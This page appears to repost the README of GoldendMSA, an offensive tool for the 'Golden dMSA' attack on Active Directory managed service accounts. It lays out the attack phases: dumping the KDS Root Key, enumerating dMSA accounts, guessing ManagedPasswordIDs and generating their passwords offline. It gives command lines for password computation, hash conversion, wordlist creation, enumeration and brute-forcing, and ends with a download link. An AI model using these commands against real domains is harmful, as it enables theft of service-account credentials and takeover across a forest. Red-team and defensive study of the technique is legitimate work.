Golden dMSA: tool exploits Golden DMSA attack against delegated Managed Service Accounts.
Golden dMSA
This tool exploits a new attack against delegated Managed Service Accounts called the “Golden DMSA” attack. The technique allows attackers to generate passwords for all associated dMSAs offline.
Additional information is available in this post golden dMSA.
Attack steps
Phase 1: Key Material Extraction (pre requirement of the attack)
- Dump the KDS Root Key from the DC
Phase 2: Enumerate dMSA accounts
- Brute-force or use LDAP to discover data on dMSA accounts in the forest – SamAccountName and SID.
Phase 3: ManagedPasswordID guessing
- Create a wordlist of possible values and identify the correct managedPasswordId and password hashes through targeted guessing.
Phase 4: Password Generation
- Generate valid passwords for any gMSA and dMSA associated with the compromised key.
Usage
Couple examples of useful commands:
Computation of gMSA’s passwords based on KDS Root key and ManadgedPasswordID:
[pastacode lang=”markup” manual=”%24%20GoldendMSA.exe%20compute%20-s%20%3Csid%3E%20-k%20%3CKDS%20Root%20key%3E%20-d%20%3Cdomain%20name%3E%20-m%20%3CManadgedPasswordID%3E” message=”” highlight=”” provider=”manual”/]
Converts a base64 password of dMSA/ gMSA to NTLM, AES128, AES256:
[pastacode lang=”markup” manual=”%24%20GoldendMSA.exe%20convert%20-d%20%3Cdomain%20name%3E%20-u%20%3Cusername%20end%20with%20%24%3E%20-p%20%3Cbase64%20password%3E” message=”” highlight=”” provider=”manual”/]
Create a wordlist for dMSA’s password bruteforcing:
[pastacode lang=”markup” manual=”%24%20GoldendMSA.exe%20wordlist%20-s%20%3CdMSA’s%20sid%3E%20-d%20%3CdMSA’s%20domain%3E%20-f%20%3Cforest’s%20domain%3E%20-k%20%3Cid%20of%20kds%20root%20key%3E” message=”” highlight=”” provider=”manual”/]
Gathers info on dMSAs/gMSAs based on ldap or RID enumeration:
[pastacode lang=”markup” manual=”%24%20GoldendMSA.exe%20info%20-d%20%3Cdomain%20name%3E%20-m%20ldap%0A%24%20GoldendMSA.exe%20info%20-d%20%3Cdomain%20name%3E%20-m%20brute%20-u%20%3Cusername%3E%20-p%20%3Cpassword%3E%20-o%20%3Cuser’s%20domain%20name%3E%20-s%20%3CgMSA’s%20sid%3E%0A%24%20GoldendMSA.exe%20info%20-d%20%3Cdomain%20name%3E%20-m%20brute%20-u%20%3Cusername%3E%20-p%20%3Cpassword%3E%20-o%20%3Cuser’s%20domain%20name%3E%20-r%20%3Cnumber%3E” message=”” highlight=”” provider=”manual”/]
Gathers info on KDS root keys (requires Enterprise admins permissions):
[pastacode lang=”markup” manual=”%24%20GoldendMSA.exe%20kds%0A%24%20GoldendMSA.exe%20kds%20-g%20%3Cguid%20of%20KDS%20root%20key%3E” message=”” highlight=”” provider=”manual”/]
Gathers info on KDS root keys (requires SYSTEM permissions on a DC):
[pastacode lang=”markup” manual=”%24%20GoldendMSA.exe%20kds%20–domain%20%3Cdomain%20name%3E” message=”” highlight=”” provider=”manual”/]
Bruteforce dMSA’s password:
[pastacode lang=”markup” manual=”%24%20GoldendMSA.exe%20bruteforce%20-s%20%3Csid%20of%20dmsa%3E%20-i%20%3Ckds%20root%20key%20id%3E%20-k%20%3Ckds%20root%20key%3E%20-d%20%3Cdmsa’s%20domain%3E%20-u%20%3Cdmsa%20(should%20end%20with%20%24)%3E%20-t%0A%24%20GoldendMSA.exe%20bruteforce%20-s%20%3Csid%20of%20dmsa%3E%20-i%20%3Ckds%20root%20key%20id%3E%20-k%20%3Ckds%20root%20key%3E%20-d%20%3Cdmsa’s%20domain%3E%20-u%20%3Cdmsa%20(should%20end%20with%20%24)%3E%20-v” message=”” highlight=”” provider=”manual”/]
Download
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
